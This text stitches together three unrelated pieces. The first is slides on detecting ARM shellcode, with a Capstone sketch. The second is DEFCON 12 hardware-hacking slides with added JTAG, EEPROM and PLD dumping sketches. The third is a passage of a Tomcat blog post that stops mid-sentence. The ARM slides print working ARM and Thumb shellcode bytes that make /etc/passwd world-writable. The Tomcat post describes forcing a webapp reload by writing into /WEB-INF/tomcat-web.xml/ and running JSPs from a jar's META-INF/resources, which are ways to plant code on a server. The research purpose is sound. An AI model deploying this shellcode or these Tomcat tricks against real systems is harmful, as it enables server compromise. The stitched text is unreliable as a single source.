Shellcodes for ARM: Your Pills Don't Work on Me, x86 Svetlana Gaivoronski @SadieSv Ivan Petrov @_IvanPetrov_ Why it's important Increasing number of ARM-based devices Significant number of vulnerable software and huge base of reusable code Memory corruption errors are still there @SadieSv @_IvanPetrov_ Is it decidable? Activator • NOP • GetPC Decryptor Payload Return address zone Structure limitations Size limitations @SadieSv @_IvanPetrov_ Maybe it's not that bad? Stack canaries: calculates a pseudo-random number and saves it to the stack; SafeSEH: instead of protecting the stack, protects exception handlers; DEP: makes the stack/part of the stack non-executable; ASLR: randomizes the base address of executables, stack and heap in a process's address space. BYPASSED @SadieSv @_IvanPetrov_ Okay, what's the ARM problem? Shellcodes are already there Shellcode detection methods (okay, "smarter" than signature-based) are not… Are x86-based methods applicable here? For analysis of the applicability of x86-based techniques to ARM it's reasonable to understand the differences between the two platforms. @SadieSv @_IvanPetrov_ Main differences of the two platforms: Command size is fixed; 2 different CPU modes (32-bit and 16-bit) and the possibility of dynamically switching between them; Possibility of conditional instruction execution; Possibility of direct access to PC; load-store architecture (not possible to access memory directly from arithmetic instructions); Function arguments (and the return address as well) go to registers, not the stack. @SadieSv @_IvanPetrov_ if (err != 0) printf("Error code = %i\n", err); else printf("OK!\n"); Without conditional instructions: CMP r1, #0 BEQ .L4 LDR r0, <string_1_address> BL printf B .L8 .L4: LDR r0, <string_2_address> BL printf .L8: With conditional instructions: CMP r1, #0 LDRNE r0, <string_1_address> LDREQ r0, <string_2_address> BL printf Conditional execution @SadieSv @_IvanPetrov_ Thumb CPU mode chmod("/etc/passwd", 0777) - 31 bytes "\x78\x46" // mov r0, pc "\x10\x30" // adds r0, #16 "\xff\x21" // movs r1, #255 ; 0xff "\xff\x31" // adds r1, #255 ; 0xff "\x01\x31" // adds r1, #1 "\x0f\x37" // adds r7, #15 "\x01\xdf" // svc 1 ; chmod(..) "\x40\x40" // eors r0, r0 "\x01\x27" // movs r7, #1 "\x01\xdf" // svc 1 ; exit(0) "\x2f\x65\x74\x63" "\x2f\x70\x61\x73" "\x73\x77" "\x64" chmod("/etc/passwd", 0777) - 51 bytes "\x0f\x00\xa0\xe1" // mov r0, pc "\x20\x00\x90\xe2" // adds r0, r0, #32 "\xff\x10\xb0\xe3" // movs r1, #255 ; 0xff "\xff\x10\x91\xe2" // adds r1, r1, #255 ; 0xff "\x01\x10\x91\xe2" // adds r1, r1, #1 "\x0f\x70\x97\xe2" // adds r7, r7, #15 "\x01\x00\x00\xef" // svc 1 "\x00\x00\x30\xe0" // eors r0, r0, r0 "\x01\x70\xb0\xe3" // movs r7, #1 "\x01\x00\x00\xef" // svc 1 "\x2f\x65\x74\x63" "\x2f\x70\x61\x73" "\x73\x77" "\x64" Thumb mode ARM mode @SadieSv @_IvanPetrov_ Local recap Static analysis Dynamic analysis @SadieSv @_IvanPetrov_ What causes such problems (mostly) New obfuscation techniques:
1. Conditional execution; 2. Additional CPU mode. @SadieSv @_IvanPetrov_ The next step? We already have (still on-going) work on x86 shellcode detection: – Set of features Are they features of ARM-based shellcodes too? Can we identify something new? Static features • Correct disassembly of a chain of at least K instructions; • Command of CPU mode switching (BX Rm); • Existence of Get-UsePC code; • Number of specific patterns (argument initializations, function calls) exceeds some threshold; • Argument initialization strictly before system calls; • Write-to-memory and load-from-memory cycles; • Return address in some range of values; • Last instruction in the chain is (BL, BLX), or a system call (svc); • Operands of self-identified code and code with indirect jumps must be initialized. Correct disassembly of a chain of at least K instructions Not a shellcode Shellcode @SadieSv @_IvanPetrov_ Not a shellcode Not a shellcode Not a shellcode Command of CPU mode switching (BX Rm) CPU mode switch Shellcode in Thumb mode Arguments for system call PC register Jump with exchange Thumb mode number @SadieSv @_IvanPetrov_ Existence of Get-UsePC code PC register Encrypted shellcode Get PC Use PC Get PC into LR register (r14) Use PC @SadieSv @_IvanPetrov_ Argument initializations for system calls and library calls Arguments System call number System call _socket #281 _connect #283 @SadieSv @_IvanPetrov_ Write-to-memory and load-from-memory cycles Encrypted shellcode Read from memory Store to memory Cycle counter Address of encrypted payload Main cycle @SadieSv @_IvanPetrov_ Return address in some range of values Return address Vulnerable buffer Stack Payload Shellcode 0xbeffedbc 0xbeffedbc 0xbeffedbc 0xbeffedbc 0xbeffedbc 0xbeffedbc Return address zone @SadieSv @_IvanPetrov_ Dynamic features • The number of payload reads exceeds a threshold; • The number of unique writes into memory exceeds a threshold; • Control flow is redirected to a "just written" address location at least once; • Number of executed wx-instructions exceeds a threshold; • Conditional-based signatures. @SadieSv @_IvanPetrov_ Read and write to memory Decryptor Encrypted payload N unique reads and writes @SadieSv @_IvanPetrov_ Control flow switch Decryptor Decrypted payload Control flow @SadieSv @_IvanPetrov_ Conditional-based signatures Z = 0 & C = 0 Z = 1 & C = 0 ADDEQS r0, r1 ADDEQS r0, r1 AL block (every flag) AL block (every flag) CS block (C == 1) Z = 0 C = 1 CS block (C == 1) NE block (Z == 0) NE block (Z == 0) ADDCCS r3, r4 ADDCCS r3, r4 Z = 1 C = 0 If the EQ block was executed, then Z = 1, else Z = 0 NE block (Z == 0) NE block (Z == 0) @SadieSv @_IvanPetrov_ Hybrid classifier @SadieSv @_IvanPetrov_ What's next Make another module for the shellcode detection tool - Demorpheus @SadieSv @_IvanPetrov_ Experiments • Shellcodes; • Legitimate binaries; • Random data; • Multimedia. @SadieSv @_IvanPetrov_ Experiments @SadieSv @_IvanPetrov_ Datasets FN FP Shellcodes 0 n/a Legitimate binaries n/a 1.1 Multimedia n/a 0.33 Random data n/a 0.27 @SadieSv @_IvanPetrov_ Dataset Throughput Shellcodes 56.5 Mb/s Legitimate binaries 64.8 Mb/s Multimedia 93.8 Mb/s Random data 99.5 Mb/s 2 GHz Intel Core i7 Experiments Your questions? @SadieSv @_IvanPetrov_
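Several of the static features listed above (a sufficiently long chain of correctly decoded instructions, a BX Rm mode switch, GetPC-style reads of the program counter, a terminating system call) can be prototyped with an off-the-shelf disassembler. Below is a rough sketch using the Capstone library; the threshold K and the feature checks are placeholders for illustration, not the authors' actual classifier, and a real detector would also need sliding windows and Thumb-mode handling.

# Rough sketch of checking a few of the static features with Capstone (ARM mode only).
from capstone import Cs, CS_ARCH_ARM, CS_MODE_ARM

K = 8   # minimal chain length, placeholder threshold

def static_features(buf, base=0):
    md = Cs(CS_ARCH_ARM, CS_MODE_ARM)
    insns = list(md.disasm(buf, base))

    long_chain = len(insns) >= K                                     # K correctly decoded instructions
    mode_switch = any(i.mnemonic.startswith("bx") for i in insns)    # BX Rm (possible ARM->Thumb switch)
    getpc = any("pc" in i.op_str for i in insns
                if i.mnemonic.startswith(("mov", "add", "sub")))     # PC read into a register (GetPC)
    syscall = any(i.mnemonic in ("svc", "swi") for i in insns)       # system call present in the chain

    return {"long_chain": long_chain, "mode_switch": mode_switch,
            "getpc": getpc, "syscall": syscall}

# Example input: the ARM-mode chmod("/etc/passwd", 0777) shellcode bytes from the slides.
sc = bytes.fromhex("0f00a0e1200090e2ff10b0e3ff1091e2011091e20f7097e2"
                   "010000ef000030e00170b0e3010000ef")
print(static_features(sc))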
pdf
1 Advanced Hardware Hacking Techniques Joe Grand (Kingpin) joe@grandideastudio.com DEFCON 12 Friday, July 30 2 © 2004 Grand Idea Studio, Inc. Agenda The "What" and "Why" of Hardware Hacking Enclosure & Mechanical Attacks Electrical Attacks Final Thoughts and Conclusions 3 © 2004 Grand Idea Studio, Inc. What is Hardware Hacking (to me)? Doing something with a piece of hardware that has never been done before – Personalization and customization (e.g., "hot rodding for geeks") – Adding functionality – Capacity or performance increase – Defeating protection and security mechanisms (not for profit) Creating something extraordinary Harming nobody in the process 2 4 © 2004 Grand Idea Studio, Inc. Why Hardware Hacking? Curiosity – To see how things work Improvement and Innovation – Make products better/cooler – Some products are sold to you intentionally limited or "crippled" Consumer Protection – I don't trust glossy marketing brochures...do you? 5 © 2004 Grand Idea Studio, Inc. Hardware Security Myths Many security-related products rely on misconceptions to remain "secure" Hardware hacking is hard Consumers lack the competency or courage to void their warranty Therefore, hardware is "safe" 6 © 2004 Grand Idea Studio, Inc. Gaining Access to a Product Purchase – Buy the product from a retail outlet (with cash) Evaluation – Rent or borrow the product Active – Product is in active operation, not owned by attacker Remote Access – No physical access to product, attacks launched remotely 3 7 © 2004 Grand Idea Studio, Inc. Attack Vectors Interception (or Eavesdropping) – Gain access to protected information without opening the product Interruption (or Fault Generation) – Preventing the product from functioning normally Modification – Tampering with the product, typically invasive Fabrication – Creating counterfeit assets of a product 8 © 2004 Grand Idea Studio, Inc. Enclosure & Mechanical Attacks Opening Housings External Interfaces Anti-Tamper Mechanisms Conformal Coating and Epoxy Encapsulation Removal 9 © 2004 Grand Idea Studio, Inc. Opening Housings Goal is to get access to internal circuitry Usually as easy as loosening some screws or prying open the device 4 10 © 2004 Grand Idea Studio, Inc. Opening Housings 2 If glue is used to seal housing, use heat gun to soften glue and pry open with a knife – Some designers use glue with a high-melting point - enclosure will melt/deform before the glue does Some devices are sonically-welded to create a one-piece outer shell – If done properly, will require destruction of device in order to open it 11 © 2004 Grand Idea Studio, Inc. Opening Housings 3 Security bits and one-way screws – Used to prevent housings from being easily opened – Ex.: Bathroom stalls, 3.8mm and 4.5mm security bit for Nintendo and Sega game cartridges/systems – To identify a particular bit type, visit www.lara.com/reviews/screwtypes.htm – Bits available at electronics stores, swapmeets, online 12 © 2004 Grand Idea Studio, Inc. External Interfaces Usually a product's lifeline to the outside world – Manufacturing tests, field programming/upgrading, peripheral connections – Ex.: JTAG, RS232, USB, Firewire, Ethernet Wireless interfaces also at risk (though not discussed here) – Ex.: 802.11b, Bluetooth Any interface that connects to a third-party may contain information that is useful for an attack – Could possibly obtain data, secrets, etc. 5 13 © 2004 Grand Idea Studio, Inc. 
External Interfaces 2 Look for obfuscated interfaces – Ex.: Proprietary or out-of-the-ordinary connector types, hidden access doors or holes Many times, test points just hidden by a sticker 14 © 2004 Grand Idea Studio, Inc. External Interfaces 3 Use multimeter or oscilloscope to probe and determine functionality – Logic state of pins can help with an educated guess – Ex.: Pull pins high or low, observe results, repeat Monitor communications using H/W or S/W-based protocol analyzer – USB: SnoopyPro – RS232 and parallel port: PortMon Send intentionally malformed/bad packets to cause a fault – If firmware doesn't handle this right, device could trigger unintended operation useful for an attack 15 © 2004 Grand Idea Studio, Inc. External Interfaces: Backdoors Architecture-specific debug and test interfaces (usually undocumented) Diagnostic serial ports – Provides information about system, could also be used for administration – Ex.: Intel NetStructure crypto accelerator administrator access [1] Developer's backdoors – Commonly seen on networking equipment, telephone switches – Ex.: Palm OS debug mode [2] – Ex.: Sega Dreamcast CD-ROM boot 6 16 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG JTAG (IEEE 1149.1) interface is often the Achilles' heel Industry-standard interface for testing and debugging – Ex.: System-level testing, boundary-scanning, and low- level testing of dies and components Can provide a direct interface to hardware – Has become a common attack vector – Ex.: Flash memory reprogramming on Pocket PC devices (www.xda-developers.com/jtag) 17 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG 2 Five connections (4 required, 1 optional): ← TDO = Data Out (from target device) → TDI = Data In (to target device) → TMS = Test Mode Select → TCK = Test Clock → /TRST = Test Reset (optional) H/W interface to PC can be built with a few dollars of off-the-shelf components – Ex.: www.lart.tudelft.nl/projects/jtag, http://jtag-arm9.sourceforge.net/circuit.txt, or ftp://www.keith-koep.com/pub/arm-tools/jtag/ jtag05_sch.pdf 18 © 2004 Grand Idea Studio, Inc. External Interfaces: JTAG 3 JTAG Tools (http://openwince.sourceforge.net/jtag) serves as the S/W interface on the PC Removing JTAG functionality from a device is difficult – Designers usually obfuscate traces, cut traces, or blow fuses, all of which can be repaired by an attacker 7 19 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms Primary facet of physical security for embedded systems Attempts to prevent unauthorized physical or electronic tampering against the product Most effectively used in layers Possibly bypassed with knowledge of method – Purchase one or two devices to serve as "sacrificial lambs" 20 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms 2 Tamper Resistance – Specialized materials used to make tampering difficult – Ex.: One-way screws, epoxy encapsulation, sealed housings Tamper Evidence – Ensure that there is visible evidence left behind by tampering – Only successful if a process is in place to check for deformity – Ex.: Passive detectors (seals, tapes, glues), special enclosure finishes (brittle packages, crazed aluminum, bleeding paint) 21 © 2004 Grand Idea Studio, Inc. 
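To make the JTAG interface description above a bit more concrete, here is a rough sketch of reading a device's 32-bit IDCODE by bit-banging the four required signals. The set_tms_tdi() and read_tdo() helpers are placeholders for whatever cheap cable is actually used (parallel port, FTDI, GPIO), and it assumes the device loads IDCODE into the data register at TAP reset, which most but not all parts do; this is an illustration of the TAP sequencing, not a drop-in tool.

# Sketch: read the JTAG IDCODE via TCK/TMS/TDI/TDO bit-banging (pin helpers are placeholders).
def set_tms_tdi(tms, tdi):
    raise NotImplementedError("drive the TMS/TDI pins and pulse TCK here")

def read_tdo():
    raise NotImplementedError("sample the TDO pin here")

def clock(tms, tdi=0):
    # one TCK cycle: set TMS/TDI, pulse the clock
    set_tms_tdi(tms, tdi)

def read_idcode():
    # Five TCK cycles with TMS=1 always reach Test-Logic-Reset, which selects IDCODE.
    for _ in range(5):
        clock(tms=1)
    # Test-Logic-Reset -> Run-Test/Idle -> Select-DR -> Capture-DR -> Shift-DR
    clock(tms=0)
    clock(tms=1)
    clock(tms=0)
    clock(tms=0)
    # Shift out 32 bits, LSB first, staying in Shift-DR.
    idcode = 0
    for bit in range(32):
        idcode |= read_tdo() << bit
        clock(tms=0)
    return idcode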
Anti-Tamper Mechanisms 3 Tamper Detection – Enable the hardware device to be aware of tampering – Switches: Detect the opening of a device, breach of security boundary, or movement of a component – Sensors: Detect an operational or environmental change – Circuitry: Detect a puncture, break, or attempted modification of the security envelope 8 22 © 2004 Grand Idea Studio, Inc. Anti-Tamper Mechanisms 4 Tamper Response – Countermeasures taken upon the detection of tampering – Ex.: Zeroize critical memory, shutdown/disable/destroy device, enable logging features Physical Security Devices for Computer Subsystems [3] provides comprehensive attacks and countermeasures – Ex.: Probing, machining, electrical attacks, physical barriers, tamper evident solutions, sensors, response technologies 23 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal Encapsulation used to protect circuitry from moisture, dust, mold, corrosion, or arcing Epoxy or urethane coatings leave a hard, difficult to remove film 24 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal 2 The good news: The coatings are not specifically designed for security – Can usually be bypassed with special chemicals like MG Chemicals' 8310 Conformal Coating Stripper (www.mgchemicals.com) Brute force approach: Dremel tool and wooden skewer as a drill bit – Doesn't damage the components underneath coating – Might remove the soldermask, but not a big deal... 9 25 © 2004 Grand Idea Studio, Inc. Conformal Coating and Epoxy Encapsulation Removal 3 When all else fails, use X-ray to determine location of components or connections 26 © 2004 Grand Idea Studio, Inc. Electrical Attacks Surface Mount Devices Probing Boards Memory and Programmable Logic Chip Delidding and Die Analysis Emissions and Side-Channel Attacks Clock and Timing 27 © 2004 Grand Idea Studio, Inc. Surface Mount Devices Harder to work with than through-hole devices – Ex.: Fine-pitched packages, tiny discrete components – Don't get discouraged Human hands have more resolution than the naked eye can resolve – A microscope can go a long way to solder components Circuit Cellar, July 2004: Build your own computer-controlled, temperature-adjusting SMT oven 10 28 © 2004 Grand Idea Studio, Inc. Surface Mount Devices 2 Easy to desolder using ChipQuik SMD Removal Kit (www.chipquik.com) 29 © 2004 Grand Idea Studio, Inc. Probing Boards Look for test points and exposed traces/bus lines Surface mount leads and points are usually too small to manually probe Many ways to access: – Solder probe wire onto board using microscope – Use an SMD micrograbber ($5-$50) – Use a probe adapter (> $100) from www.emulation.com, www.ironwoodelectronics.com, or www.advintcorp.com – Build your own probe 30 © 2004 Grand Idea Studio, Inc. Probing Boards 2 Ex.: Tap board used to intercept data transfer over Xbox's HyperTransport bus [4] 11 31 © 2004 Grand Idea Studio, Inc. Memory and Programmable Logic Most memory is notoriously insecure – Not designed with security in mind – Serial EEPROMs can be read in-circuit, usually SPI or I2C bus (serial clock and data) [5] Difficult to securely and totally erase data from RAM and non-volatile memory [6] – Remnants may exist and be retrievable from devices long after power is removed – Could be useful to obtain program code, temporary data, crypto keys, etc. 32 © 2004 Grand Idea Studio, Inc. 
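The in-circuit serial EEPROM reads mentioned just above are easy to prototype once the clock and data lines are tapped. A hedged sketch using the smbus2 package follows; the bus number, the 0x50 device address (typical of 24Cxx parts) and the 256-byte size are assumptions for illustration, not details from the slides, and real parts may need 16-bit addressing or SPI instead.

# Sketch: dump a small 24Cxx-style I2C EEPROM in-circuit (e.g. from a Raspberry Pi).
from smbus2 import SMBus, i2c_msg

EEPROM_ADDR = 0x50   # common 24Cxx base address (assumption)
SIZE = 256           # bytes to dump (assumption)

with SMBus(1) as bus:                       # /dev/i2c-1
    write_ptr = i2c_msg.write(EEPROM_ADDR, [0x00])   # set the read pointer to 0
    read_data = i2c_msg.read(EEPROM_ADDR, SIZE)      # sequential read of the array
    bus.i2c_rdwr(write_ptr, read_data)
    dump = bytes(list(read_data))

with open("eeprom.bin", "wb") as f:
    f.write(dump)
print(dump[:16].hex())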
Memory and Programmable Logic 2 SRAM-based FPGAs most vulnerable to attack – Must load configuration from external memory – Bit stream can be monitored to retrieve entire configuration To determine PLD functionality, try an I/O scan attack – Cycle through all possible combinations of inputs to determine outputs 33 © 2004 Grand Idea Studio, Inc. Memory and Programmable Logic 3 Security fuses and boot-block protection – Enabled for "write-once" access to a memory area or to prevent full read back – Usually implemented in any decent design – Might be bypassed with die analysis attacks (FIB) or electrical faults [7] – Ex.: PIC16C84 attack in which security bit is removed by increasing VCC during repeated write accesses 12 34 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis Analysis of Integrated Circuit (IC) dies is typically the most difficult area for hardware hacking With access to the IC die, you can: – Retrieve contents of Flash, ROM, FPGAs, other non- volatile devices (firmware and crypto keys stored here) – Modify or destroy gates and other silicon structures (e.g., reconnect a security fuse that prevents reading of the device) 35 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis 2 The good thing is that IC designers make mistakes, so tools are needed – Failure analysis – Chip repair and inspection What tools? – Chip Decappers – Scanning Electron Microscope (SEM) – Voltage Contrast Microscopy – Focused Ion Beam (FIB) 36 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis 3 Equipment available on the used/surplus market Access to tools in most any large academic institution Reverse engineering and analysis services exist (still high priced, $10k-$20k) – Can provide functional investigation, extraction, IC simulation, analyze semiconductor processes, etc. – Ex.: Semiconductor Insights (www.semiconductor.com) and Chipworks (www.chipworks.com) 13 37 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: IC Decapsulation Decapsulation tools used to "delid" or "decap" the top of the IC housing Uses chemical or mechanical means (or both) Will keep the silicon die intact while removing the outer material Ex.: Nippon Scientific (www.nscnet.co.jp/e), Nisene Technology Group (www.nisene.com), ULTRA TEC Manufacturing (www.ultratecusa. com), approx. $30k new, $15k used 38 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Scanning Electron Microscope Used to perform sub-micron inspection of the physical die Metal or other material layers might need to be de-processed before access to gate structures Depending on ROM size and properties, can visually recreate contents (Photos from ADSR Ltd. and FIB International) 39 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Voltage Contrast Microscopy Detect variances of voltages and display them as contrast images – Performed with a SEM Ex.: Could extract information from a Flash ROM storage cell (Photo from http://testequipmentcanada.com/VoltageContrastPaper.html) 14 40 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Focused Ion Beams Send a focused stream of ions onto the surface of the chip – Beam current and optional use of gas/vapor changes the function Cutting – Ex.: Cut a bond pad or trace from the die ($1k-$10k) Deposition – Ex.: Add a jumper/reconnect a trace on the die ($1k- $10k) 41 © 2004 Grand Idea Studio, Inc. 
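The I/O scan attack mentioned earlier in this section is conceptually trivial: drive every input combination and record the outputs to recover the device's truth table. A small sketch is below; the drive_inputs/read_outputs helpers stand in for whatever test fixture is wired to the PLD, and the 8-input width is just an example.

# Sketch of an I/O scan against a combinational PLD: walk all input vectors, log outputs.
from itertools import product

NUM_INPUTS = 8   # example width; real devices vary

def drive_inputs(bits):
    raise NotImplementedError("set the PLD input pins here")

def read_outputs():
    raise NotImplementedError("sample the PLD output pins here")

truth_table = {}
for combo in product((0, 1), repeat=NUM_INPUTS):
    drive_inputs(combo)
    truth_table[combo] = read_outputs()

# truth_table now maps every input vector to the observed outputs; from here the logic
# equations can be recovered (e.g. with a minimizer). Note this only works directly for
# purely combinational devices -- registered outputs require exploring internal state.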
Chip Decapping and Die Analysis: Focused Ion Beams 2 Imaging – High-resolution image of die structure Ex.: Fibics Incorporated (www.fibics.com) or FIB International (www.fibinternational.com) (Photos from Fibics Incorporated) 42 © 2004 Grand Idea Studio, Inc. Chip Decapping and Die Analysis: Focused Ion Beams 3 (Photos from Fibics Incorporated) 15 43 © 2004 Grand Idea Studio, Inc. Emissions and Side-Channel Attacks All devices leak information – EMI (electromagnetic interference) from circuits (TEMPEST) [8, 9] – Power supply fluctuations – Visible radiation from LEDs and monitors [10, 11] Can be monitored and used by attacker to determine secret information Devices may also be susceptible to RF or ESD (immunity) – Intentionally injected to cause failure 44 © 2004 Grand Idea Studio, Inc. Emissions and Side-Channel Attacks: Power Supply Simple Power Analysis (SPA) – Attacker directly observes power consumption – Varies based on microprocessor operation – Easy to identify intensive functions (cryptographic) Differential Power Analysis (DPA) [12] – Advanced mathematical methods to determine secret information on a device 45 © 2004 Grand Idea Studio, Inc. Clock and Timing Attacks rely on changing or measuring timing characteristics of the system Active (Invasive) timing attacks – Vary clock (speed up or slow down) to induce failure or unintended operation Passive timing attacks – Non-invasive measurements of computation time – Different tasks take different amounts of time 16 46 © 2004 Grand Idea Studio, Inc. "Security through obscurity" does not work – Provides a false sense of security to designers/users – Might temporarily discourage an attacker, but it only takes one to discover it Weak tactics to look out for when hacking "secure" hardware products: – Encoded forms of fixed data – Scrambled address lines through extra logic – Intentionally messy/lousy code – Spurious and meaningless data ("signal decoys") Security Through Obscurity 47 © 2004 Grand Idea Studio, Inc. Advances in chip packaging – Ultra-fine pitch and chip-scale packaging (e.g., BGA, COB, CIB) – Not as easy to access pins/connections to probe – Discrete components can now easily be inhaled Highly-integrated chips (sub-micron) – Difficult, but not impossible, to probe and modify High speed boards – Processor and memory bus > hundreds of MHz – Serial bus speeds approaching Gigabit/sec. Hardware Hacking Challenges 48 © 2004 Grand Idea Studio, Inc. Cost of equipment – Advanced tools still beyond the reach of average hobbyist (probing, decapping, SEMs, etc.) – "State of the art" defined by what hackers can find in the trash and at swapmeets Societal pressures – Hardware hacking is practically mainstream, but "hacker" is still a naughty word Hardware Hacking Challenges 2 17 49 © 2004 Grand Idea Studio, Inc. Conclusions Hardware hacking is approaching a mainstream activity Plays an important role in the balance between consumers and corporations (e.g., The Man) Think as a designer would Nothing is ever 100% secure – Given enough time, resources, and motivation, you can break anything The possibilities are endless Have fun! 50 © 2004 Grand Idea Studio, Inc. References 1. J. Grand, et al, "Hack Proofing Your Network: 2nd Edition," Syngress Publishing, 2002, www.grandideastudio.com/files/books/hpyn2e_chapter14.pdf 2. J. Grand (Kingpin), “Palm OS Password Lockout Bypass,” March 2001, www.grandideastudio.com/files/security/mobile/ palm_backdoor_debug_advisory.txt 3. S.H. 
Weingart, "Physical Security Devices for Computer Subsystems: A Survey of Attacks and Defenses,'' Workshop on Cryptographic Hardware and Embedded Systems, 2000. 4. A. Huang, "Hacking the Xbox: An Introduction to Reverse Engineering," No Starch Press, 2003. 5. J. Grand (Kingpin), "Attacks on and Countermeasures for USB Hardware Token Devices,'' Proceedings of the Fifth Nordic Workshop on Secure IT Systems, 2000, www.grandideastudio.com/files/security/tokens/usb_hardware_ token.pdf 6. P. Gutmann, "Secure Deletion from Magnetic and Solid-State Memory Devices," Sixth USENIX Security Symposium, 1996, www.usenix.org/publications/ library/proceedings/sec96/full_papers/gutmann/index.html 51 © 2004 Grand Idea Studio, Inc. References 2 7. S. Skorobogatov, "Breaking Copy Protection in Microcontrollers," www.cl.cam.ac.uk/~sps32/mcu_lock.html 8. W. van Eck, “Electronic Radiation from Video Display Units: An Eavesdropping Risk?” Computers and Security, 1985, www.jya.com/emr.pdf 9. J.R. Rao and P. Rohatgi, "EMPowering Side-Channel Attacks," IBM Research Center, www.research.ibm.com/intsec/emf-paper.ps 10. Joe Loughry and D.A. Umphress, "Information Leakage from Optical Emanations," ACM Transactions on Information and System Security v.5, #3, August 2002, www.applied-math.org/optical_tempest.pdf 11. M. Kuhn, "Optical Time-Domain Eavesdropping Risks of CRT Displays," Proceedings of the 2002 IEEE Symposium on Security and Privacy, May 2002, www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf 12. P. Kocher, J. Jaffe, and B. Jun, "Overview of Differential Power Analysis," www.cryptography.com/resources/whitepapers/DPATechInfo.PDF 18 52 © 2004 Grand Idea Studio, Inc. Appendix A: Additional Resources J. Grand, et al, "Hardware Hacking: Have Fun While Voiding Your Warranty," Syngress Publishing, January 2004. J. Grand, "Practical Secure Hardware Design for Embedded Systems," Proceedings of the 2004 Embedded Systems Conference, 2004, www.grandideastudio.com/ files/security/hardware/practical_secure_hardware_design.pdf A. Huang, "Keeping Secrets in Hardware: the Microsoft XBox Case Study," Massachusetts Institute of Technology AI Memo 2002-008, May 2002, http://web.mit.edu/bunnie/www/proj/anatak/AIM-2002-008.pdf F. Beck, "Integrated Circuit Failure Analysis - A Guide to Preparation Techniques," John Wiley & Sons, 1998. O. Kömmerling and M. Kuhn, "Design Principles for Tamper-Resistant Smartcard Processors," USENIX Workshop on Smartcard Technology, 1999, www.cl.cam. ac.uk/~mgk25/sc99-tamper.pdf R.G. Johnston and A.R.E. Garcia, "Vulnerability Assessment of Security Seals", Journal of Security Administration, 1997, www.securitymanagement.com/ library/lanl_00418796.pdf 53 © 2004 Grand Idea Studio, Inc. Appendix B: Related Web Sites Cambridge University Security Group - TAMPER Laboratory, www.cl.cam.ac.uk/Research/Security/tamper Molecular Expressions: Chip Shots Gallery, http://microscopy.fsu.edu/chipshots/index.html Bill Miller's CircuitBending.com, http://billtmiller.com/circuitbending Virtual-Hideout.Net, www.virtual-hideout.net LinuxDevices.com - The Embedded Linux Portal, www.linuxdevices.com Roomba Community - Discussing and Dissecting the Roomba, www.roombacommunity.com TiVo Techies, www.tivotechies.com 54 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade Bright overhead lighting or desk lamp Protective gear (mask, goggles, rubber gloves, smock, etc.) 
ESD protection (anti-static mat and wriststrap) Screwdrivers X-ACTO hobby knife Dremel tool Needle file set 19 55 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 2 Wire brushes Sandpaper Glue Tape Cleaning supplies Variable-speed cordless drill w/ drill bits Heat gun and heat-shrink tubing Center punch 56 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 3 Nibbling tool Jigsaw Wire stripper/clipper Needle-nose pliers Tweezers Soldering iron w/ accessories (solder sucker, various tips, etc.) Basic electronic components 57 © 2004 Grand Idea Studio, Inc. Appendix C: Tools of the Warranty Voiding Trade 4 Microscope Digital and analog multimeters Adjustable power supply Device programmer UV EPROM eraser PCB etching kit Oscilloscope Logic Analyzer 20 58 © 2004 Grand Idea Studio, Inc. Appendix D: Where to Obtain the Tools The Home Depot (www.homedepot.com) Lowe's (www.lowes.com) Hobby Lobby (www.hobbylobby.com) McMaster-Carr (www.mcmaster.com) Radio Shack (www.radioshack.com) Digi-Key (www.digikey.com) Contact East (www.contacteast.com) Test Equity (www.testequity.com) Thanks! Joe Grand (Kingpin) joe@grandideastudio.com
pdf
@Y4tacker Two fun questions 1. Why does writing anything into the /WEB-INF/tomcat-web.xml/ directory trigger a reload? /WEB-INF/tomcat-web.xml/ Where the question came from It all started with one sentence: "Trigger a reload of the web app by writing any file to /WEB-INF/tomcat-web.xml/" - a directory? What the heck! One side note: this tomcat-web.xml does not take effect in every version; it depends on the configuration, details below. Working it out First of all, since Tomcat can keep loading new jars into the JVM after it has started, how would you implement that yourself? The answer is obvious: multithreading - a scheduled worker watches for file changes, and Tomcat does exactly that. I won't go into the details, since that is not the point of this post; just mentioning it briefly. As for the question this post explores, I honestly did not know the answer either, until I saw that sentence yesterday. Huh? It made me pause, because everything I had read online talked about web.xml - what is this one with the tomcat prefix, and why does creating a directory also get detected as a content change? (A friend discussed this with me today.) My first guess was that the scanner hits /WEB-INF/tomcat-web.xml/, finds it is a directory, and then walks the files inside it to see whether their contents changed. But the answer is no. I traced the source; to save time, let's start from the key part, org.apache.catalina.startup.HostConfig#checkResources. Looking at what checkResources does, it is quite clear which resources it checks. The one we care about here is /WEB-INF/tomcat-web.xml/, so keep going. Further down, note this line: long lastModified = app.reloadResources.get(s).longValue(); Just from seeing lastModified I could already guess the mechanism: timestamps! When a file inside the directory changes, the directory's own timestamp changes as well. But since we are here, let's look inside anyway. And indeed that is the case; afterwards the reload loads the jars under /WEB-INF/lib again, which I covered yesterday, so I won't repeat it here. Now there is another question: where did that resource path come from in the first place? How is app.reloadResources populated? It is actually set when Tomcat first starts, in org.apache.catalina.core.StandardContext#addWatchedResource. And where does that value come from? From conf/context.xml under the installation directory. So everything is explained: the resources are watched via the WatchedResource configuration, and this is also the default name: <Context> <WatchedResource>WEB-INF/web.xml</WatchedResource> <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource> <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource> </Context> 2. For a jar loaded from WEB-INF/lib in Tomcat, a JSP written directly under its /META-INF/resources/ can be accessed and executed Where the question came from A really slick trick, first time I have seen it; I was about to go eat, so I only took a quick look. Roughly speaking, when the browser requests 